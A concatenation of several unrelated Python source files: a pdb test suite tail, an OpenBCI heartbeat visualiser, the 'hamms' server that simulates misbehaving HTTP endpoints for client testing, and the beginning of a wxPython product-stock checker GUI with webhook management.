# open the file as binary so we can force \r\n newline
with open(support.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(support.unlink, 'bar.py')
stdout, stderr = self.run_pdb(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Fail to step into the caller after a return')
def test_issue13210(self):
# invoking "continue" on a non-main thread triggered an exception
# inside signal.signal
# raises SkipTest if python was built without threads
support.import_module('threading')
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb().set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn('Error', stdout.decode(),
"Got an error running test script under PDB")
def tearDown(self):
support.unlink(support.TESTFN)
def load_tests(*args):
from test import test_pdb
suites = [unittest.makeSuite(PdbTestCase), doctest.DocTestSuite(test_pdb)]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
|
heart_beat.py | import sys
sys.path.append('C:/Python37/Lib/site-packages')
from pyqtgraph.Qt import QtGui, QtCore
import pyqtgraph as pg
import random
from pyOpenBCI import OpenBCICyton
import threading
import time
import numpy as np
from scipy import signal
import random
import numpy as np
from PIL import Image
img = Image.open('heart_1.png').convert('RGBA')
arr = np.array(img)
img2 = Image.open('heart_2.png').convert('RGBA')
arr2 = np.array(img2)
SCALE_FACTOR = (4500000)/24/(2**23-1) #From the pyOpenBCI repo
colors = 'rgbycmwr'
app = QtGui.QApplication([])
win = pg.GraphicsWindow(title='Python OpenBCI GUI')
# title_graph = win.addPlot(row=0, col=0, colspan=4,title='Python OpenBCI GUI')
ts_plots = win.addPlot(row=0, col=0, colspan=4, title='Channel %d' % 1, labels={'left': 'uV'})
fft_plot = win.addPlot(row=2, col=0, rowspan=2, colspan=2, title='Filtered Plot', labels={'left': 'uV', 'bottom': 'Hz'})
fft_plot.setLimits(xMin=1,xMax=125, yMin=0, yMax=1e7)
ss_plot = win.addPlot(row=4, col=0, rowspan=2, colspan=2, title='signal',labels={'left':'Is beat'})
heart_im = win.addViewBox(lockAspect=True)
imv = pg.ImageItem()
heart_im.addItem(imv)
imv.setImage(arr)
data= [0]
def save_data(sample):
global data
data.append(sample.channels_data[0]*SCALE_FACTOR)
def updater():
global data, plots, colors
fs = 250 #Hz
disp_sec = 3 #Seconds to display
t_data = np.array(data[-(fs*disp_sec + 100):]).T #transpose data
#Notch Filter at 60 Hz
def notch_filter(val, data, fs=250, b=5):
notch_freq_Hz = np.array([float(val)])
for freq_Hz in np.nditer(notch_freq_Hz):
bp_stop_Hz = freq_Hz + 3.0 * np.array([-1, 1])
b, a = signal.butter(b, bp_stop_Hz / (fs / 2.0), 'bandstop')
fin = data = signal.lfilter(b, a, data)
return fin
def bandpass(start, stop, data, fs = 250):
bp_Hz = np.array([start, stop])
b, a = signal.butter(1, bp_Hz / (fs / 2.0), btype='bandpass')
return signal.lfilter(b, a, data, axis=0)
nf_data = np.array(notch_filter(60, t_data, b = 10))
nf_data = np.array(notch_filter(50, nf_data, b = 10))
bp_nf_data = np.array(bandpass(2, 50, nf_data))
ts_plots.clear()
ts_plots.plot(pen='r').setData(bp_nf_data[100:])
#fft of data
fft_plot.clear()
sp = np.absolute(np.fft.fft(bp_nf_data))
freq = np.fft.fftfreq(bp_nf_data.shape[-1], 1.0/fs)
fft_plot.plot(pen='y').setData(freq, sp)
one_beat = nf_data[100:300]
filt = one_beat[::-1]
ss_plot.clear()
new_arr = bp_nf_data > np.average(bp_nf_data) + np.std(bp_nf_data)
ss_plot.plot(pen='g').setData(new_arr[100:]*1)
if sum(new_arr[-100:]*1):
imv.setImage(arr2)
else:
imv.setImage(arr)
def start_board():
board = OpenBCICyton(port='COM5', daisy=False)
board.start_stream(save_data)
if __name__ == '__main__':
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
x = threading.Thread(target=start_board)
x.daemon = True
x.start()
timer = QtCore.QTimer()
timer.timeout.connect(updater)
timer.start(0)
QtGui.QApplication.instance().exec_()
|
__init__.py | from email import message_from_string
import json
import logging
import random
from StringIO import StringIO
from threading import Thread
import time
import urlparse
from flask import Flask, request, Response, g
from httpbin.helpers import get_dict, status_code
from twisted.internet import protocol, reactor
from twisted.web.server import Site
from twisted.web.wsgi import WSGIResource
from werkzeug.routing import Rule
from werkzeug.http import parse_accept_header
from .morse import morsedict
logger = logging.getLogger("hamms")
logger.setLevel(logging.INFO)
# XXX: also update version in setup.py
__version__ = '1.3'
SERVER_HEADER = 'Hamms/{version}'.format(version=__version__)
BASE_PORT = 5500
class HammsSite(Site):
def getResourceFor(self, request):
request.setHeader('Server', SERVER_HEADER)
return Site.getResourceFor(self, request)
class HammsServer(object):
""" Start the hamms server in a thread.
Usage::
hs = HammsServer()
hs.start(beginning_port=5500)
# When you are done working with hamms
hs.stop()
:param int beginning_port: Hamms will start servers on all ports from
beginning_port to beginning_port + 14.
"""
def start(self, beginning_port=BASE_PORT):
self.beginning_port = beginning_port
self.retry_cache = {}
listen(reactor, base_port=self.beginning_port, retry_cache=self.retry_cache)
if not reactor.running:
self.t = Thread(target=reactor.run, args=(False,))
self.t.daemon = True
self.t.start()
def stop(self):
reactor.stop()
def listen(_reactor, base_port=BASE_PORT, retry_cache=None):
# in likelihood there is no benefit to passing in the reactor as only one of
# them can ever run at a time.
retry_cache = retry_cache or {}
retries_app = create_retries_app(retry_cache)
sleep_resource = WSGIResource(reactor, reactor.getThreadPool(), sleep_app)
sleep_site = HammsSite(sleep_resource)
status_resource = WSGIResource(reactor, reactor.getThreadPool(), status_app)
status_site = HammsSite(status_resource)
large_header_resource = WSGIResource(reactor, reactor.getThreadPool(),
large_header_app)
large_header_site = HammsSite(large_header_resource)
retries_resource = WSGIResource(reactor, reactor.getThreadPool(), retries_app)
retries_site = HammsSite(retries_resource)
unparseable_resource = WSGIResource(reactor, reactor.getThreadPool(),
unparseable_app)
unparseable_site = HammsSite(unparseable_resource)
toolong_content_resource = WSGIResource(reactor, reactor.getThreadPool(),
toolong_content_app)
toolong_content_site = HammsSite(toolong_content_resource)
_reactor.listenTCP(base_port + ListenForeverServer.PORT, ListenForeverFactory())
_reactor.listenTCP(base_port + EmptyStringTerminateImmediatelyServer.PORT,
EmptyStringTerminateImmediatelyFactory())
_reactor.listenTCP(base_port + EmptyStringTerminateOnReceiveServer.PORT,
EmptyStringTerminateOnReceiveFactory())
_reactor.listenTCP(base_port + MalformedStringTerminateImmediatelyServer.PORT,
MalformedStringTerminateImmediatelyFactory())
_reactor.listenTCP(base_port + MalformedStringTerminateOnReceiveServer.PORT,
MalformedStringTerminateOnReceiveFactory())
_reactor.listenTCP(base_port + FiveSecondByteResponseServer.PORT,
FiveSecondByteResponseFactory())
_reactor.listenTCP(base_port + ThirtySecondByteResponseServer.PORT,
ThirtySecondByteResponseFactory())
_reactor.listenTCP(base_port + sleep_app.PORT, sleep_site)
_reactor.listenTCP(base_port + status_app.PORT, status_site)
_reactor.listenTCP(base_port + SendDataPastContentLengthServer.PORT,
SendDataPastContentLengthFactory())
_reactor.listenTCP(base_port + large_header_app.PORT, large_header_site)
_reactor.listenTCP(base_port + retries_app.PORT, retries_site)
_reactor.listenTCP(base_port + DropRandomRequestsServer.PORT,
DropRandomRequestsFactory())
_reactor.listenTCP(base_port + unparseable_app.PORT, unparseable_site)
_reactor.listenTCP(base_port + IncompleteResponseServer.PORT,
IncompleteResponseFactory())
_reactor.listenTCP(base_port + toolong_content_app.PORT, toolong_content_site)
def get_remote_host(transport):
try:
peer = transport.getPeer()
return peer.host
except Exception:
return "<ipaddr>"
def get_port(transport):
try:
return transport.getHost().port
except Exception:
return "<port>"
def get_header(header_name, data):
try:
rline, raw_headers = data.split('\r\n', 1)
headers = message_from_string(raw_headers)
return headers.get(header_name, "")
except Exception:
return ""
def _log_t(transport, data, status=None):
ipaddr = get_remote_host(transport)
port = get_port(transport)
ua = get_header('user-agent', data)
return _log(ipaddr, port, data, status=status, ua=ua)
def _log(ipaddr, port, data, status=None, ua=""):
try:
topline = data.split('\r\n')[0]
return "{ipaddr} {port} \"{topline}\" {status} \"{ua}\"".format(
ipaddr=ipaddr, port=port, topline=topline, ua=ua, status=status or "-")
except Exception:
logger.exception("caught exception while formatting log")
return "<data received>"
class ListenForeverServer(protocol.Protocol):
PORT = 1
def dataReceived(self, data):
logger.info(_log_t(self.transport, data))
class ListenForeverFactory(protocol.Factory):
def buildProtocol(self, addr):
return ListenForeverServer()
class EmptyStringTerminateImmediatelyServer(protocol.Protocol):
PORT = 2
def dataReceived(self, data):
logger.info(_log_t(self.transport, data))
def connectionMade(self):
self.transport.write('')
self.transport.loseConnection()
class EmptyStringTerminateImmediatelyFactory(protocol.Factory):
def buildProtocol(self, addr):
return EmptyStringTerminateImmediatelyServer()
class EmptyStringTerminateOnReceiveServer(protocol.Protocol):
PORT = 3
def dataReceived(self, data):
logger.info(_log_t(self.transport, data))
self.transport.write('')
self.transport.loseConnection()
class EmptyStringTerminateOnReceiveFactory(protocol.Factory):
def buildProtocol(self, addr):
return EmptyStringTerminateOnReceiveServer()
class MalformedStringTerminateImmediatelyServer(protocol.Protocol):
PORT = 4
def dataReceived(self, data):
logger.info(_log_t(self.transport, data))
def connectionMade(self):
self.transport.write('foo bar')
self.transport.loseConnection()
class MalformedStringTerminateImmediatelyFactory(protocol.Factory):
def buildProtocol(self, addr):
return MalformedStringTerminateImmediatelyServer()
class MalformedStringTerminateOnReceiveServer(protocol.Protocol):
PORT = 5
def dataReceived(self, data):
logger.info(_log_t(self.transport, data))
self.transport.write('foo bar')
self.transport.loseConnection()
class MalformedStringTerminateOnReceiveFactory(protocol.Factory):
def buildProtocol(self, addr):
return MalformedStringTerminateOnReceiveServer()
empty_response = ('HTTP/1.1 204 No Content\r\n'
'Server: {hdr}\r\n\r\n'.format(hdr=SERVER_HEADER))
class FiveSecondByteResponseServer(protocol.Protocol):
PORT = 6
def _send_byte(self, byte):
self.transport.write(byte)
def dataReceived(self, data):
try:
timer = 5
for byte in empty_response:
reactor.callLater(timer, self._send_byte, byte)
timer += 5
reactor.callLater(timer, self.transport.loseConnection)
logger.info(_log_t(self.transport, data, status=204))
except Exception:
logger.info(_log_t(self.transport, data))
class FiveSecondByteResponseFactory(protocol.Factory):
def buildProtocol(self, addr):
return FiveSecondByteResponseServer()
class ThirtySecondByteResponseServer(protocol.Protocol):
PORT = 7
def _send_byte(self, byte):
self.transport.write(byte)
def dataReceived(self, data):
try:
timer = 30
for byte in empty_response:
reactor.callLater(timer, self._send_byte, byte)
timer += 30
reactor.callLater(timer, self.transport.loseConnection)
logger.info(_log_t(self.transport, data, status=204))
except Exception:
logger.info(_log_t(self.transport, data))
class ThirtySecondByteResponseFactory(protocol.Factory):
def buildProtocol(self, addr):
return ThirtySecondByteResponseServer()
class SendDataPastContentLengthServer(protocol.Protocol):
PORT = 10
def dataReceived(self, data):
logger.info(_log_t(self.transport, data, status=200))
def connectionMade(self):
self.transport.write('HTTP/1.1 200 OK\r\n'
'Server: {server}\r\n'
'Content-Type: text/plain\r\n'
'Content-Length: 3\r\n'
'Connection: keep-alive\r\n'
'\r\n{body}'.format(server=SERVER_HEADER,
body='a'*1024*1024))
self.transport.loseConnection()
class SendDataPastContentLengthFactory(protocol.Factory):
def buildProtocol(self, addr):
return SendDataPastContentLengthServer()
def success_response(content_type, response):
return ('HTTP/1.1 200 OK\r\n'
'Server: {server}\r\n'
'Content-Type: {ctype}\r\n\r\n'
'{response}'.format(ctype=content_type, server=SERVER_HEADER,
response=response))
class DropRandomRequestsServer(protocol.Protocol):
PORT = 13
def dataReceived(self, data):
body = data.split('\r\n')
try:
method, url, http_vsn = body[0].split(' ')
except Exception:
# we got weird data, just fail
logger.info(_log_t(self.transport, data))
self.transport.loseConnection()
o = urlparse.urlparse(url)
query = urlparse.parse_qs(o.query)
if 'failrate' in query:
failrate = query['failrate'].pop()
else:
failrate = 0.05
if random.random() >= float(failrate):
logger.info(_log_t(self.transport, data, status=200))
self.transport.write(
success_response('application/json', '{"success": true}'))
else:
logger.info(_log_t(self.transport, data))
self.transport.loseConnection()
class DropRandomRequestsFactory(protocol.Factory):
def buildProtocol(self, addr):
return DropRandomRequestsServer()
def write_incomplete_response(transport, content_type, body):
transport.write('Content-Type: {ctype}\r\n'.format(ctype=content_type))
transport.write('Content-Length: {length}\r\n'.format(
length=len(body)+2000))
transport.write('\r\n{body}'.format(body=body))
transport.loseConnection()
INCOMPLETE_JSON = '{"message": "the json body is incomplete.", "key": {"nested_message": "blah blah blah'
INCOMPLETE_XML = '<?xml version="1.0" ?><response><status type="http">200 foo'
INCOMPLETE_PLAIN = 'incomplete document respo'
INCOMPLETE_HTML = '<!doctype html><html><head><title>incomplete'
class IncompleteResponseServer(protocol.Protocol):
PORT = 16
def dataReceived(self, data):
accept_header_value = get_header('Accept', data)
accept_cls = parse_accept_header(accept_header_value)
self.transport.write('HTTP/1.1 200 OK\r\n')
if 'text/html' == accept_cls.best:
write_incomplete_response(self.transport, 'text/html',
INCOMPLETE_HTML)
elif 'text/plain' == accept_cls.best:
write_incomplete_response(self.transport, 'text/plain',
INCOMPLETE_PLAIN)
elif 'text/xml' == accept_cls.best:
write_incomplete_response(self.transport, 'text/xml',
INCOMPLETE_XML)
else:
write_incomplete_response(self.transport, 'application/json',
INCOMPLETE_JSON)
class IncompleteResponseFactory(protocol.Factory):
def buildProtocol(self, addr):
return IncompleteResponseServer()
sleep_app = Flask(__name__)
sleep_app.PORT = 8
status_app = Flask(__name__)
status_app.PORT = 9
large_header_app = Flask(__name__)
large_header_app.PORT = 11
unparseable_app = Flask(__name__)
unparseable_app.PORT = 14
toolong_content_app = Flask(__name__)
toolong_content_app.PORT = 15
def create_retries_app(cache):
retries_app = Flask(__name__)
retries_app.PORT = 12
retries_app.cache = cache
# we want the retries app to listen on all methods
retries_app.url_map.add(Rule('/', endpoint='index'))
@retries_app.endpoint("index")
def check_retries():
json_hdr = {'Content-Type': 'application/json'}
key = request.args.get('key', 'default')
tries = request.args.get('tries', 3)
try:
tries = int(tries)
except Exception:
return Response(status=400, headers=json_hdr, response=json.dumps({
'error': 'Please pass an integer number of tries',
'key': key,
'success': False,
}))
if key in retries_app.cache:
retries_app.cache[key] -= 1
else:
retries_app.cache[key] = int(tries) - 1
if retries_app.cache[key] <= 0:
data = {
'key': key,
'tries_remaining': retries_app.cache[key],
'success': True
}
return Response(response=json.dumps(data), status=200,
headers=json_hdr)
else:
msg = 'The server had an error. Try again {retry_times} more {time_p}'
time_p = 'time' if retries_app.cache[key] == 1 else 'times'
content = {
'error': msg.format(retry_times=retries_app.cache[key], time_p=time_p),
'tries_remaining': retries_app.cache[key],
'key': key,
'success': False,
}
return Response(response=json.dumps(content), status=500,
headers=json_hdr)
@retries_app.route("/counters", methods=['POST'])
def reset():
key = request.values.get('key', 'default')
tries = request.values.get('tries', 3)
try:
tries = int(tries)
except Exception:
return Response(status=400, headers=json_hdr, response=json.dumps({
'error': 'Please pass an integer number of tries',
'key': key,
'success': False,
}))
retries_app.cache[key] = tries
content = {
'key': key,
'tries_remaining': tries,
'success': True,
}
return Response(response=json.dumps(content), status=200,
headers={'Content-Type': 'application/json'})
@retries_app.route("/counters", methods=['GET'])
def counter():
content = {'counters': retries_app.cache, 'success': True}
return Response(response=json.dumps(content), status=200,
headers={'Content-Type': 'application/json'})
@retries_app.after_request
def retries_header(resp):
_log_flask(resp.status_code)
resp.headers['Server'] = 'hamms'
return resp
return retries_app
@sleep_app.route("/")
def sleep():
n = request.values.get('sleep', 5)
time.sleep(float(n))
hdrs = get_dict('headers')
return Response(response=json.dumps(hdrs), status=200,
headers={'Content-Type': 'application/json'})
@status_app.route("/")
def status():
n = request.values.get('status', 200)
return status_code(int(n))
@large_header_app.route("/")
def large_header():
n = request.values.get('size', 63*1024)
req_headers = get_dict('headers')
resp_headers = {
'Content-Type': 'application/json',
'Cookie': 'a'*int(n)
}
return Response(response=json.dumps(req_headers), status=200,
headers=resp_headers)
@unparseable_app.route("/")
def unparseable():
def _morse():
hdr = {'Content-Type': 'text/morse'}
message = " STOP ".join([
"DEAREST ANN",
"TIMES ARE HARD",
"MY TREADMILL DESK DOESNT RECLINE ALL THE WAY",
"THE KITCHEN HASNT HAD SOYLENT FOR TWO WHOLE DAYS",
"HOW IS ANYONE SUPPOSED TO PROGRAM IN THESE CONDITIONS",
"PLEASE SEND HELP",
]) + " STOP"
morse_message = StringIO()
for i, letter in enumerate(message):
morse_message.write(morsedict[letter])
return Response(response=morse_message.getvalue(), headers=hdr)
if 'text/morse' not in request.accept_mimetypes:
return _morse()
elif not request.accept_mimetypes.accept_json:
hdr = {'Content-Type': 'application/json'}
resp = {
'status': 200,
'message': 'This is a JSON response. You did not ask for JSON data.',
}
return Response(response=json.dumps(resp), headers=hdr)
elif not request.accept_mimetypes.accept_html:
hdr = {'Content-Type': 'text/html'}
return Response(response="<!doctype html><html><head><title>Your API is Broken</title></head><body>This should be JSON.</body></html>", headers=hdr)
elif 'text/csv' not in request.accept_mimetypes:
hdr = {'Content-Type': 'text/csv'}
return Response(response="message,status\nThis is a CSV response that your code almost certainly can't parse", headers=hdr)
else:
# */* or similar, return morse.
return _morse()
@toolong_content_app.route("/")
def toolong():
r = Response()
r.automatically_set_content_length = False
r.headers['Content-Length'] = 2300
if (request.accept_mimetypes.best == 'application/json' or
request.accept_mimetypes.best == '*/*'):
r.headers['Content-Type'] = 'application/json'
r.set_data(INCOMPLETE_JSON)
elif request.accept_mimetypes.best == 'text/html':
r.headers['Content-Type'] = 'text/html'
r.set_data(INCOMPLETE_HTML)
elif request.accept_mimetypes.best == 'text/plain':
r.headers['Content-Type'] = 'text/plain'
r.set_data(INCOMPLETE_PLAIN)
elif (request.accept_mimetypes.best == 'text/xml' or
request.accept_mimetypes.best == 'application/xml'):
r.headers['Content-Type'] = 'text/xml'
r.set_data(INCOMPLETE_XML)
else:
r.headers['Content-Type'] = 'application/json'
r.set_data(INCOMPLETE_JSON)
return r
def _get_port_from_url(url):
urlo = urlparse.urlparse(url)
try:
host, port = urlo.netloc.split(':')
return port
except Exception:
return "<port>"
def _log_flask(status):
port = _get_port_from_url(request.url)
url_line = "{method} {url} HTTP/1.0".format(
method=request.method.upper(), url=request.full_path)
ua = request.headers.get('user-agent', '')
logger.info(_log(request.remote_addr, port, url_line, status, ua=ua))
@sleep_app.after_request
def log_sleep(resp):
_log_flask(resp.status_code)
return resp
@status_app.after_request
def log_status(resp):
_log_flask(resp.status_code)
return resp
@large_header_app.after_request
def log_large_header(resp):
_log_flask(resp.status_code)
return resp
def main(port=BASE_PORT):
logging.basicConfig()
logger.info("Listening...")
listen(reactor, port)
reactor.run()
if __name__ == "__main__":
main()
|
gui.py |
# -*- coding: utf-8 -*-
import wx
import wx.xrc
import json
import requests
import time
from datetime import datetime
import urllib.parse as urlparse
from urllib.parse import parse_qs
from threading import Thread
from selenium import webdriver
from chromedriver_py import binary_path as driver_path
from lxml import html
#put maxprice to 0 for defaults (any), set it to a plain number for example 300 with no quotes to ignore anything that is listed over 300.
#only applies to walmart URLs for right now
#maxprice = 300
maxprice = 0
###########################################################################
## Class WebhookManager
###########################################################################
# TODO refactor all of this
class WebhookManager ( wx.Frame ):
def __init__( self, parent ):
wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Manage Webhooks", pos = wx.DefaultPosition, size = wx.Size( 354,199 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )
self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
outer = wx.BoxSizer( wx.VERTICAL )
self.panel = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
box = wx.BoxSizer( wx.HORIZONTAL )
self.btnPanel = wx.Panel( self.panel, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
btnbox = wx.BoxSizer( wx.VERTICAL )
self.newBtn = wx.Button( self.btnPanel, wx.ID_ANY, u"New", wx.DefaultPosition, wx.DefaultSize, 0 )
btnbox.Add( self.newBtn, 0, wx.ALL, 5 )
self.renBtn = wx.Button( self.btnPanel, wx.ID_ANY, u"Update", wx.DefaultPosition, wx.DefaultSize, 0 )
btnbox.Add( self.renBtn, 0, wx.ALL, 5 )
self.delBtn = wx.Button( self.btnPanel, wx.ID_ANY, u"Delete", wx.DefaultPosition, wx.DefaultSize, 0 )
btnbox.Add( self.delBtn, 0, wx.ALL, 5 )
self.clrBtn = wx.Button( self.btnPanel, wx.ID_ANY, u"Clear All", wx.DefaultPosition, wx.DefaultSize, 0 )
btnbox.Add( self.clrBtn, 0, wx.ALL, 5 )
self.btnPanel.SetSizer( btnbox )
self.btnPanel.Layout()
btnbox.Fit( self.btnPanel )
box.Add( self.btnPanel, 0, wx.EXPAND |wx.ALL, 5 )
self.listPanel = wx.Panel( self.panel, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
lstbox = wx.BoxSizer( wx.VERTICAL )
#webhookListChoices = []
self.webhookList = wx.ListBox( self.listPanel, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, webhookListChoices, 0 )
lstbox.Add( self.webhookList, 1, wx.ALL|wx.EXPAND, 5 )
self.listPanel.SetSizer( lstbox )
self.listPanel.Layout()
lstbox.Fit( self.listPanel )
box.Add( self.listPanel, 1, wx.EXPAND |wx.ALL, 5 )
self.panel.SetSizer( box )
self.panel.Layout()
box.Fit( self.panel )
outer.Add( self.panel, 1, wx.EXPAND, 5 )
self.SetSizer( outer )
self.Layout()
self.Centre( wx.BOTH )
# Connect Events
self.newBtn.Bind( wx.EVT_BUTTON, self.NewItem )
self.renBtn.Bind( wx.EVT_BUTTON, self.OnUpdate )
self.delBtn.Bind( wx.EVT_BUTTON, self.OnDelete )
self.clrBtn.Bind( wx.EVT_BUTTON, self.OnClear )
def __del__( self ):
pass
def NewItem(self, event):
webhook_dict = return_data("./data/webhooks.json")
webhook_url = wx.GetTextFromUser('Enter a Webhook URL', 'Insert dialog')
if webhook_url != '':
webhook_name = wx.GetTextFromUser('Give the webhook URL a friendly name', 'Insert dialog')
self.webhookList.Append(webhook_name)
set_data("./data/webhooks.json", webhook_name, webhook_url)
webhook_dict = return_data("./data/webhooks.json")
webhookListChoices.append(webhook_name)
def OnUpdate(self, event):
webhook_dict = return_data("./data/webhooks.json")
sel = self.webhookList.GetSelection()
text = self.webhookList.GetString(sel)
webhook_to_modify = webhook_dict[text]
modified_webhook_url = wx.GetTextFromUser('Update item', 'Update Item dialog', webhook_to_modify)
if modified_webhook_url != '':
webhook_dict.update({text: modified_webhook_url})
set_data("./data/webhooks.json", text, modified_webhook_url)
webhook_dict = return_data("./data/webhooks.json")
#self.webhookList.Delete(sel)
#item_id = self.webhookList.Insert(renamed, sel)
#self.webhookList.SetSelection(item_id)
def OnDelete(self, event):
webhook_dict = return_data("./data/webhooks.json")
sel = self.webhookList.GetSelection()
text = self.webhookList.GetString(sel)
if sel != -1:
self.webhookList.Delete(sel)
del webhook_dict[text]
with open("./data/webhooks.json", "w") as file:
json.dump(webhook_dict, file)
file.close()
webhook_dict = return_data("./data/webhooks.json")
def OnClear(self, event):
self.webhookList.Clear()
with open("./data/webhooks.json", "w") as file:
json.dump({}, file)
file.close()
webhook_dict = return_data("./data/webhooks.json")
###########################################################################
## Class WebhookDialog
###########################################################################
class WebhookDialog ( wx.Dialog ):
def __init__( self, parent ):
wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"Assign Webhook", pos = wx.DefaultPosition, size = wx.Size( 201,103 ), style = wx.DEFAULT_DIALOG_STYLE )
self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
vbox = wx.BoxSizer( wx.VERTICAL )
self.pnl = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
vbox.Add( self.pnl, 1, wx.EXPAND |wx.ALL, 5 )
comboChoices = []
self.combo = wx.ComboBox( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, comboChoices, 0 )
vbox.Add( self.combo, 0, wx.ALL|wx.EXPAND, 5 )
self.okButton = wx.Button( self, wx.ID_ANY, u"Okay", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox.Add( self.okButton, 0, wx.ALL|wx.EXPAND, 5 )
self.SetSizer( vbox )
self.Layout()
self.Centre( wx.BOTH )
# Connect Events
self.okButton.Bind( wx.EVT_BUTTON, self.update )
webhook_dict = return_data("./data/webhooks.json")
for k in webhook_dict:
self.combo.Append(k)
def update(self, e):
try:
selected = ex.list.GetFocusedItem()
i = selected
url = ex.list.GetItemText(i, col=0)
new_webhook_key = self.combo.GetSelection()
new_webhook = self.combo.GetString(new_webhook_key)
if new_webhook != "":
print(url, new_webhook)
urldict.update({url: new_webhook})
set_data("./data/products.json", url, new_webhook)
ex.list.SetItem(i, 1, new_webhook)
num = ex.list.GetItemCount()
else:
print("select a webhook first")
except:
print("An error ocurred. Did you select a URL before clicking Edit?")
self.Close()
self.Close()
def OnClose(self, e):
self.Destroy()
def __del__( self ):
pass
###########################################################################
## Class GUI
###########################################################################
class GUI ( wx.Frame ):
def __init__( self, parent ):
wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Product Checker", pos = wx.DefaultPosition, size = wx.Size( 1009,660 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )
self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
hbox = wx.BoxSizer( wx.HORIZONTAL )
self.leftPanel = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
vbox2 = wx.BoxSizer( wx.VERTICAL )
self.icon = wx.StaticBitmap( self.leftPanel, wx.ID_ANY, wx.Bitmap( u"img/icon.png", wx.BITMAP_TYPE_ANY ), wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.icon, 0, wx.ALL|wx.EXPAND, 15 )
self.whBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"Manage Webhooks", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.whBtn, 0, wx.ALL|wx.EXPAND, 5 )
self.addBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"Add Product URL", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.addBtn, 0, wx.ALL|wx.EXPAND, 5 )
self.editBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"Edit Highlighted Item", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.editBtn, 0, wx.ALL|wx.EXPAND, 5 )
self.delBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"Delete Highlighted Item", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.delBtn, 0, wx.ALL|wx.EXPAND, 5 )
self.strtAllBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"START All Jobs", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.strtAllBtn, 0, wx.ALL|wx.EXPAND, 5 )
self.app2Btn = wx.Button( self.leftPanel, wx.ID_ANY, u"STOP All Jobs", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.app2Btn, 0, wx.ALL|wx.EXPAND, 5 )
vbox2.Add( ( 0, 0), 1, wx.EXPAND, 5 )
self.leftPanel.SetSizer( vbox2 )
self.leftPanel.Layout()
vbox2.Fit( self.leftPanel )
hbox.Add( self.leftPanel, 0, wx.EXPAND, 5 )
self.rightPanel = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
vbox = wx.BoxSizer( wx.VERTICAL )
self.list = wx.ListCtrl( self.rightPanel, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LC_REPORT )
vbox.Add( self.list, 1, wx.ALL|wx.EXPAND, 5 )
self.log = wx.TextCtrl( self.rightPanel, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( -1,200 ), wx.TE_MULTILINE|wx.TE_READONLY )
vbox.Add( self.log, 0, wx.ALL|wx.EXPAND, 5 )
self.rightPanel.SetSizer( vbox )
self.rightPanel.Layout()
vbox.Fit( self.rightPanel )
hbox.Add( self.rightPanel, 1, wx.EXPAND, 5 )
self.SetSizer( hbox )
self.Layout()
self.statusBar = self.CreateStatusBar( 1, wx.STB_SIZEGRIP, wx.ID_ANY )
self.m_menubar1 = wx.MenuBar( 0 )
self.menuFile = wx.Menu()
self.exitItem = wx.MenuItem( self.menuFile, wx.ID_ANY, u"Exit", wx.EmptyString, wx.ITEM_NORMAL )
self.menuFile.Append( self.exitItem )
self.m_menubar1.Append( self.menuFile, u"File" )
